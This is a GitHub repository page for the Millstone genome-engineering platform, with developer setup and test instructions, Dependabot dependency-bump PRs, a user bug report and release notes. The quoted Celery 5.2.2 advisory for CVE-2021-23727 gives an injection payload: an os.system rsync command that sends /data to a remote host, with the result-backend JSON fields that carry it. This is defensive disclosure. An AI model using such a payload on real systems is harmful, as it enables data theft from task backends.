Millstone is a distributed bioinformatics software platform designed to facilitate genome engineering for synthetic biology. Automate iterative design, analysis, and debugging for projects involving hundreds of microbial genomes.
The easiest way to use Millstone is directly on Amazon Web Services (AWS) using our pre-built AMI. Instructions here.
Docs, demo and installation information is available here: http://churchlab.github.io/millstone/index.html. Developer instructions are below.
The following is intended for developers. Most users will want to use Millstone directly on AWS as described here.
These are directions for installing Millstone on your own machine, and is meant for advanced users who want a custom installation. If you want to deploy a pre-configured Millstone instance to the cloud, then read Getting Started with Millstone on the wiki.
Before continuing, make sure all above dependencies are installed. On Mac, we prefer Homebrew for package management, and use it in the instructions below.
Before installing, you must install git
and clone the latest version of Millstone from GitHub. GitHub has information on setting up git. Once Git is installed, you can clone the repository with:
$ git clone https://github.com/churchlab/millstone.git <millstone_installation dir>
$ cd <millstone_installation dir>
We recommend using virtualenv for
creating and managing a sandbox python environment. This strategy makes it easy
to stay up with requirements. Our requirements are listed in requirements.txt
.
Follow the instructions below to setup your virtualenv and install the required
packages.
Install virtualenv if you don't have it yet. (You may want to install pip first.)
Create a new virtual environment for this project. This virtual environment isn't part of the project so just put it somewhere on your machine. I keep all of my virtual environments in the directory ~/pyenvs/.
$ virtualenv ~/pyenvs/genome-designer-env
If you want to use a version of python different from the OS default you can specify the python binary with the '-p' option:
$ virtualenv -p /usr/local/bin/python2.7 ~/pyenvs/genome-designer-env
Activate the environment in the shell. This will use python
and other binaries like pip
that are located your pyenv. You should do this whenever running any python/django scripts.
$ source ~/pyenvs/genome-designer-env/bin/activate .
Install the dependencies in your virtual environment. We use the convention of running pip freeze
to a .txt file containing a list of requirements.
Most users will want to do:
$ pip install -r requirements/deploy.txt
If you plan on editing the code, you should run:
$ pip install -r requirements/dev.txt
However, in reality, this doesn't seem to work perfectly. In particular, it may be necessary to install specific packages first.
NOTE: Watch changes to requirements.txt and re-run the install command when collaborators add new dependencies.
We currently submodule jbrowse
and perhaps will do so with other tools in the
future. Specifically, we have submoduled a forked copy of jbrowse
at a
specific commit. To checkout the appropriate submodule states, run:
$ git submodule update --init --recursive
This will pull the submodules and also pull any of their submodules.
After installing JBrowse via the Git submodule route described above, you need to do the following to get JBrowse up and running:
NOTE: Only step 1 is necessary to get the tests to pass. The later steps need to be updated.
Run the JBrowse setup script inside the jbrowse
dir.
$ cd jbrowse
$ ./setup.sh
$ cd ..
Install nginx if it's not already installed and copy or symlink the config file to nginx sites-enabled dir.
NOTE: On Mac, the sites-enabled dir is not present on the nginx version installed with brew, so the directory has to be added and included into the
Unix:
$ sed -i.orig "s:/path/to/millstone:$(pwd):g" config/jbrowse.local.nginx
$ ln -s config/jbrowse.local.nginx /etc/nginx/sites-enabled
Mac (run these commands from the project root):
$ sed -i.orig "s:/path/to/millstone:$(pwd):g" config/jbrowse.local.nginx
$ perl -pi.orig -e '$_ .= " include /usr/local/etc/nginx/sites-enabled/*;\n" if /^http/' /usr/local/etc/nginx/nginx.conf
$ sudo mkdir -p /usr/local/etc/nginx/sites-enabled
$ sudo ln -s `pwd`/config/jbrowse.local.nginx /usr/local/etc/nginx/sites-enabled/millstone
Unix:
$ sudo service nginx restart
Mac:
$ ln -sfv /usr/local/opt/nginx/*.plist ~/Library/LaunchAgents
$ launchctl load ~/Library/LaunchAgents/homebrew.mxcl.nginx.plist
$ # to reload: sudo nginx -s reload
Install Perl local::lib module from CPAN for Jbrowse:
$ sudo cpan install local::lib
Check that JBrowse is working locally by visiting:
http://localhost/jbrowse/index.html?data=sample_data/json/volvox
NOTE: If upon running the Millstone application or its tests you observe errors
related to missing perl modules, you should also install them with cpan
.
NOTE: Tests should pass without RabbitMQ setup so okay to skip this at first.
Asynchronous processing is necessary for many of the analysis tasks in this application. We use the open source project celery since it is being actively developed and has a library for integrating with Django. Celery requires a message broker, for which we use RabbitMQ which is the default for Celery.
Install Celery
The celery
and django-celery
packages are listed in
requirements.txt and should be installed in your virtualenv following the
instructions above.
Install RabbitMQ - On Ubuntu, install using sudo:
$ sudo apt-get install rabbitmq-server
Full instructions are here.
On Mac, homebrew can be used:
$ brew install rabbitmq
After install, you can run the server with:
$ sudo /usr/local/sbin/rabbitmq-server
Further Mac instructions are here.
The following installs various third-party bioinformatics tools and sets up JBrowse.
$ cd genome_designer
$ ./millstone_setup.py
NOTE: If you make local changes, be sure to put them in a file called genome_designer/conf/local_settings.py
. You should not modify global_settings.py
.
(Mac Only) If you are using a fresh Postgres install, you may need to initialize the database:
$ initdb /usr/local/var/postgres -E utf8
$ pg_ctl -D /usr/local/var/postgres -l logfile start
$ #dbg: I had to do this on 10.10 after installing w/ brew:
$ createdb
(Mac Only) Since most new postgres Mac installations (both via brew and Postgres.app) do not have a postgres
admin user, you will need to modify your DATABASES variable in genome_designer/conf/local_settings.py
.
Navigate to the the genome_designer/
dir.
Bootstrapping the database will automatically add the user, db, and permissions:
$ python scripts/bootstrap_data.py -q
We have two kinds of tests: unit and integration. Unit tests are intended
to be more specific tests of smaller pieces of the code, while integration
tests attempt to connect multiple pieces. Also, the integration tests actually
start celery worker intstances to simulate what happens in an async
environment while our unit tests use CELERY_ALWAYS_EAGER = True
to mock out
testing celery.
We currently use django-nose for running tests, which provides a better interface than Django's native testing setup (although this might not be true with the latest Django).
To run unit tests:
(venv)$ ./scripts/run_unit_tests.sh
To run integration tests:
(venv)$ ./scripts/run_integration_tests.sh
Nose also allows us to run tests only in specific modules.
In order to run only the tests in, say, the main
app directory, run:
(venv)$ ./scripts/run_unit_tests.sh main
For integration tests, we haven't figured out the optimal syntax in the test script so to run individual tests, you'll need to do it this more explicit way:
(venv)$ ./manage.py test --settings=tests.integration_test_settings tests/integration/test_pipeline_integration.py:TestAlignmentPipeline.test_run_pipeline
The same form works for unit tests, just use --settings=tests.test_settings
Note, in the following examples we use a standard manage.py test
root, but you should adhere to the
examples above.
To run a single test module, run:
(venv)$ python manage.py test main.tests.test_models
To run a single test case, e.g.:
(venv)$ python manage.py test scripts/tests/test_alignment_pipeline.py:TestAlignmentPipeline.test_create_alignment_groups_and_start_alignments
To reuse the Postgresql database, wiping it rather than destroying and creating each time, use:
(venv)$ REUSE_DB=1 ./manage.py test
Note that for some reason integration tests currently fail if run with the form:
(venv)$ REUSE_DB=0 ./scripts/run_integration_tests.sh
Make sure you have R and unafold installed to avoid errors.
We recently introduced the concept of integration tests to our code. Previously, many of our unit tests outgrew their unit-ness, but we were still treating them like so.
We created an IntegrationTestSuiteRunner where the main difference is that we start up a celery server that handles processing tasks. We are migrating tests that should really be integration tests to be covered under this label.
When adding a test (see below), if your test touches multiple code units, it's likely that's more appropriate to put it under integration test coverage. We'll add notes shortly about how to add new integration tests.
To run integration tests, use this command. This uses nose so you can use the same options and features as before.
(venv)$ ./scripts/run_integration_tests.sh
HINT: When debugging integration tests, it may be necessary to manually clean
up previously stared celerytestworker
s. There is a script to do this for you:
$ ./scripts/kill_celerytestworkers.sh
Our test framework isn't perfect. Here are some potential problems and other hints that might help.
You might see this error:
AssertionError: No running Celery workers were found.
So far, we're aware of a couple reasons you might see this:
ps aux
and grep
are your friendsTo see running celery processes:
ps aux | grep celery
To see running integration test:
ps aux | grep python.*integration
To kill the process associated with the integration test (e.g. 777)
kill 777
To kill orphaned celerytestworker processes, we actually have a script:
./scripts/kill_celerytestworkers.sh
This command runs a specific integration test and doesn't capture stdout:
./manage.py test -s --settings=tests.integration_test_settings tests/integration/test_pipeline_integration.py:TestAlignmentPipeline.test_run_pipeline
(Right now, this documentation is only for unit tests. Information for integration tests is coming soon.)
Nose automatically discovers files with names of the form test_*.py
as test
files.
Activate your virtualenv, e.g.:
$ source ~/pyenvs/genome-designer-env/bin/activate .
Navigate to the the genome_designer/
dir.
From one terminal, start the celery server.
(venv)$ ./scripts/run_celery.sh
Open another terminal and start the django server.
(venv)$ python manage.py runserver
Visit the url http://localhost:8000/ to see the demo.
First make sure Celery is running. In another terminal do:
(venv)$ ./scripts/run_celery.sh
From the genome_designer
directory, run:
(venv)$ python scripts/bootstrap_data.py full
NOTE: This will delete the entire dev database and re-create it with the
hard-coded test models only. The username and password for this test database
are at the top of scripts/boostrap_data.py
.
Right now we use logging for just-in-time debugging. Eventually, it would be nice to have logging for more robust debugging.
Add the following lines in the file you want to log in. We use the logger debug_logger
,
which is already configured in global_settings.py.
import logging
LOGGER = logging.getLogger('debug_logger')
Then, to log something (instead of using print statements), do:
LOGGER.debug('string or variable you want to log')
By default, logs are written to genome_designer/default.log
, as specified in global_settings.py
.
On Ubuntu, if your database is called gdv2db
:
sudo -u postgres psql gdv2db
To debug tests with pdb, add pdb.set_trace()
checkpoints and use a command similar to:
REUSE_DB=1 ./manage.py test -s --pdb --pdb-failures main/tests/test_xhr_handlers.py:TestGetVariantList.test__basic_function
The debug.profiler
module contains a profile
decorator that can be added to a function. For example, to debug a view:
PROFILE_LOG_BASE = '/path/to/logs'
Make sure this directory exists before proceeding.
Import the profile decorator and add @profile('log_file_name') in front of the method you want to profile, e.g.: from debug.profiler import profile ... @profile('mylog.log') def my_view(request): ...
Use the debug/inspect_profiler_data.py
convenience script to parse the data, e.g.:
python inspect_profiler_data.py /path/to/log/mylog
Millstone development is generously supported by AWS Cloud Credits for Research.
Bumps numpy from 1.8.1 to 1.22.0.
Sourced from numpy's releases.
v1.22.0
NumPy 1.22.0 Release Notes
NumPy 1.22.0 is a big release featuring the work of 153 contributors spread over 609 pull requests. There have been many improvements, highlights are:
- Annotations of the main namespace are essentially complete. Upstream is a moving target, so there will likely be further improvements, but the major work is done. This is probably the most user visible enhancement in this release.
- A preliminary version of the proposed Array-API is provided. This is a step in creating a standard collection of functions that can be used across application such as CuPy and JAX.
- NumPy now has a DLPack backend. DLPack provides a common interchange format for array (tensor) data.
- New methods for
quantile
,percentile
, and related functions. The new methods provide a complete set of the methods commonly found in the literature.- A new configurable allocator for use by downstream projects.
These are in addition to the ongoing work to provide SIMD support for commonly used functions, improvements to F2PY, and better documentation.
The Python versions supported in this release are 3.8-3.10, Python 3.7 has been dropped. Note that 32 bit wheels are only provided for Python 3.8 and 3.9 on Windows, all other wheels are 64 bits on account of Ubuntu, Fedora, and other Linux distributions dropping 32 bit support. All 64 bit wheels are also linked with 64 bit integer OpenBLAS, which should fix the occasional problems encountered by folks using truly huge arrays.
Expired deprecations
Deprecated numeric style dtype strings have been removed
Using the strings
"Bytes0"
,"Datetime64"
,"Str0"
,"Uint32"
, and"Uint64"
as a dtype will now raise aTypeError
.(gh-19539)
Expired deprecations for
loads
,ndfromtxt
, andmafromtxt
in npyio
numpy.loads
was deprecated in v1.15, with the recommendation that users usepickle.loads
instead.ndfromtxt
andmafromtxt
were both deprecated in v1.17 - users should usenumpy.genfromtxt
instead with the appropriate value for theusemask
parameter.(gh-19615)
... (truncated)
4adc87d
Merge pull request #20685 from charris/prepare-for-1.22.0-releasefd66547
REL: Prepare for the NumPy 1.22.0 release.125304b
wipc283859
Merge pull request #20682 from charris/backport-204165399c03
Merge pull request #20681 from charris/backport-20954f9c45f8
Merge pull request #20680 from charris/backport-20663794b36f
Update armccompiler.pyd93b14e
Update test_public_api.py7662c07
Update init.py311ab52
Update armccompiler.pyDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase
.
After uploading the Fastq file and ref genome (.gnk), submit the Alignments mission. Then it shows ERROR, and I open the 'bwa_align.error' file and see the following error. I'm not sure what's going on and hope to get your answer.
The input is probably truncated. Killed Segmentation fault (core dumped) Traceback (most recent call last): File "/home/ubuntu/millstone/genome_designer/pipeline/read_alignment.py", line 156, in align_with_bwa_mem opt_processing_mask=opt_processing_mask) File "/home/ubuntu/millstone/genome_designer/pipeline/read_alignment.py", line 278, in process_sam_bam_file subprocess.check_call(sort_rmdup_cmd, shell=True, stderr=error_output) File "/usr/lib/python2.7/subprocess.py", line 540, in check_call raise CalledProcessError(retcode, cmd) CalledProcessError: Command '/home/ubuntu/millstone/genome_designer/conf/../tools/samtools/samtools sort -o /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.bam /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.sorted.tmp.bam|/home/ubuntu/millstone/genome_designer/conf/../tools/samtools/samtools rmdup - /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.sorted.bam' returned non-zero exit status 139 ==END OF ==
Bumps ipython from 0.13.2 to 7.16.3.
Sourced from ipython's releases.
7.9.0
No release notes provided.
7.8.0
No release notes provided.
7.7.0
No release notes provided.
7.6.1
No release notes provided.
7.6.0
No release notes provided.
7.5.0
No release notes provided.
7.4.0
No release notes provided.
7.3.0
No release notes provided.
7.2.0
No release notes provided.
7.1.1
No release notes provided.
7.1.0
No release notes provided.
7.0.1
No release notes provided.
7.0.0
No release notes provided.
7.0.0-doc
No release notes provided.
7.0.0rc1
No release notes provided.
7.0.0b1
No release notes provided.
6.2.1
No release notes provided.
... (truncated)
d43c7c7
release 7.16.35fa1e40
Merge pull request from GHSA-pq7m-3gw7-gq5x8df8971
back to dev9f477b7
release 7.16.2138f266
bring back release helper from master branch5aa3634
Merge pull request #13341 from meeseeksmachine/auto-backport-of-pr-13335-on-7...bcae8e0
Backport PR #13335: What's new 7.16.28fcdcd3
Pin Jedi to <0.17.2.2486838
release 7.16.120bdc6f
fix conda buildDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase
.
Bumps celery from 3.1.17 to 5.2.2.
Sourced from celery's releases.
5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payloadrsync /data [email protected]:~/data
as the exception arguments like so:{ "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data [email protected]:~/data" }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
v5.2.1
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
... (truncated)
Sourced from celery's changelog.
5.2.2
:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payloadrsync /data [email protected]:~/data
as the exception arguments like so:.. code-block:: python
{ "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data [email protected]:~/data" }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
.. _version-5.2.1:
5.2.1
:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
... (truncated)
b21c13d
Bump version: 5.2.1 → 5.2.2a60b486
Add changelog for 5.2.2.3e5d630
Fix changelog formatting.1f7ad7e
Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).2d8dbc2
Update configuration.rst9596aba
Fix typo in documentation639ad83
update doc to reflect Celery 5.2.x (#7153)d32356c
Bump version: 5.2.0 → 5.2.16842a78
Merge branch 'master' of https://github.com/celery/celery4c92cb7
changelog for v5.2.1Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase
.
Bumps django from 1.5.1 to 2.2.24.
2da029d
[2.2.x] Bumped version for 2.2.24 release.f27c38a
[2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.053cc95
[2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...6229d87
[2.2.x] Confirmed release date for Django 2.2.24.f163ad5
[2.2.x] Added stub release notes and date for Django 2.2.24.bed1755
[2.2.x] Changed IRC references to Libera.Chat.63f0d7a
[2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...5fe4970
[2.2.x] Post-release version bump.61f814f
[2.2.x] Bumped version for 2.2.23 release.b8ecb06
[2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase
.
Bumps django-registration from 1.0 to 3.1.2.
2db0bb7
Merge pull request from GHSA-58c7-px5v-82hhf314570
Bump version numbers for 3.1.2.41460db
Add CVE number to release notes.d68ec81
Add release notes for security advisory.8206af0
Filter sensitive POST parameters in error reports8e5a695
Merge pull request #224 from quroom/ko-translatione60d468
Update korean translation5666558
Merge pull request #221 from TomasLoow/master25a668e
Fix up basepython for local runs.8298d82
And do it properly.Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase
.
Publication: https://genomebiology.biomedcentral.com/articles/10.1186/s13059-017-1223-1
Latest AWS AMI was built just prior to this release and has been tested extensively: millstone_combined_2016_11_14_b7ec4874299de63377eb80e43b7fdc1e5cc4e558
An AMI with the dependency updates made for this release is being tested.
This is the first release of Millstone used in the initial Amazon AMI that we cut. This release includes the full end-to-end user flow, including alignment and SNV-calling using Freebayes.
One notable pieces that we've disabled in this release until further testing is SV calling.